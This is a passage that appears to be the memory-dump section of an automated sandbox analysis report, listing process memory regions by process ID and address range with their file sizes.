                                                                                                                                                                                                                                                                                                                        • memory/2948-256-0x0000000000400000-0x0000000000A93000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                                                        • memory/2948-270-0x00000000061B0000-0x0000000006242000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          584KB

                                                                                                                                                                                                                                                                                                                        • memory/2948-300-0x0000000000DB2000-0x0000000000DDC000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          168KB

                                                                                                                                                                                                                                                                                                                        • memory/2948-149-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/2948-271-0x0000000006250000-0x00000000062B6000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                                                                                        • memory/2948-255-0x0000000000BB0000-0x0000000000BE8000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          224KB

                                                                                                                                                                                                                                                                                                                        • memory/2948-254-0x0000000000DB2000-0x0000000000DDC000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          168KB

                                                                                                                                                                                                                                                                                                                        • memory/3112-275-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3196-434-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3232-200-0x0000000000F80000-0x00000000011EF000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          2.4MB

                                                                                                                                                                                                                                                                                                                        • memory/3232-156-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3244-305-0x0000000000400000-0x0000000000A94000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                                                        • memory/3244-153-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3244-264-0x0000000000C82000-0x0000000000CAF000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          180KB

                                                                                                                                                                                                                                                                                                                        • memory/3244-265-0x0000000000BE0000-0x0000000000C2D000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          308KB

                                                                                                                                                                                                                                                                                                                        • memory/3244-297-0x0000000000C82000-0x0000000000CAF000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          180KB

                                                                                                                                                                                                                                                                                                                        • memory/3244-268-0x0000000000400000-0x0000000000A94000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.6MB

                                                                                                                                                                                                                                                                                                                        • memory/3284-439-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3288-422-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3300-282-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3516-402-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3608-456-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3620-130-0x0000000000F50000-0x000000000104A000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1000KB

                                                                                                                                                                                                                                                                                                                        • memory/3620-132-0x000000000A3E0000-0x000000000A984000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                                                                                                                        • memory/3680-226-0x0000000002DA4000-0x0000000003429000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                                                                        • memory/3680-157-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3680-291-0x0000000002DA4000-0x0000000003429000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                                                                        • memory/3704-143-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3704-182-0x00000000004E0000-0x00000000006A0000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                                                                                                                                        • memory/3784-309-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3788-266-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3840-248-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB

                                                                                                                                                                                                                                                                                                                        • memory/3840-247-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB

                                                                                                                                                                                                                                                                                                                        • memory/3840-253-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB

                                                                                                                                                                                                                                                                                                                        • memory/3840-245-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/3840-246-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB

                                                                                                                                                                                                                                                                                                                        • memory/3840-299-0x0000000000400000-0x0000000000432000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          200KB


                                                                                                                                                                                                                                                                                                                        • memory/5060-262-0x0000000000400000-0x0000000000A77000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                                                                                        • memory/5060-260-0x00000000001F0000-0x00000000001F9000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          36KB

                                                                                                                                                                                                                                                                                                                        • memory/5060-169-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5060-276-0x0000000000C82000-0x0000000000C92000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                                                        • memory/5156-377-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5156-383-0x00000000027A0000-0x00000000037A0000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          16.0MB

                                                                                                                                                                                                                                                                                                                        • memory/5224-338-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5224-333-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5224-337-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5268-386-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5340-340-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5348-385-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5408-459-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5536-344-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5584-345-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5624-406-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5628-349-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5640-350-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5716-357-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5716-352-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/5716-355-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                        • memory/5800-417-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/6052-366-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/6060-425-0x0000000000000000-mapping.dmp

                                                                                                                                                                                                                                                                                                                        • memory/6072-367-0x0000000000000000-mapping.dmp